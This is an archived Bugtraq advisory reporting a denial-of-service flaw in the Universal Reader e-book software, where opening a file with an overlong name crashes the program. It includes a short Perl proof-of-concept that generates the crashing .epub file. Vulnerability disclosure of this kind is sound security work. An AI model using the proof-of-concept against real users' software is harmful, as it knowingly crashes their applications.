[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Universal Reader Filename Denial Of Service Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Universal Reader Filename Denial Of Service Vulnerability
From: demonalex@xxxxxxx
Date: Sat, 12 May 2012 05:44:33 GMT

Title: Universal Reader Filename Denial Of Service Vulnerability
Software : Universal Reader

Software Version : 1.16.740.0 (product version: 0.63.538)

Vendor: http://uread.superfection.com/ 

Vulnerability Published : 2012-05-12

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Universal Reader is a online/offline reader for reading polytype e-book files.
Universal Reader contains any denial of service vulnerability about openning 
long-name files. Success in exploiting this vulnerability will crumble 
uread.exe process.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Prev by Date: [SECURITY] [DSA 2670-1] wordpress security update
Next by Date: Liferay users can assign themselves to organizations, leading to possible privilege escalation
Previous by thread: [SECURITY] [DSA 2670-1] wordpress security update
Next by thread: Liferay users can assign themselves to organizations, leading to possible privilege escalation
Index(es):
- Date
- Thread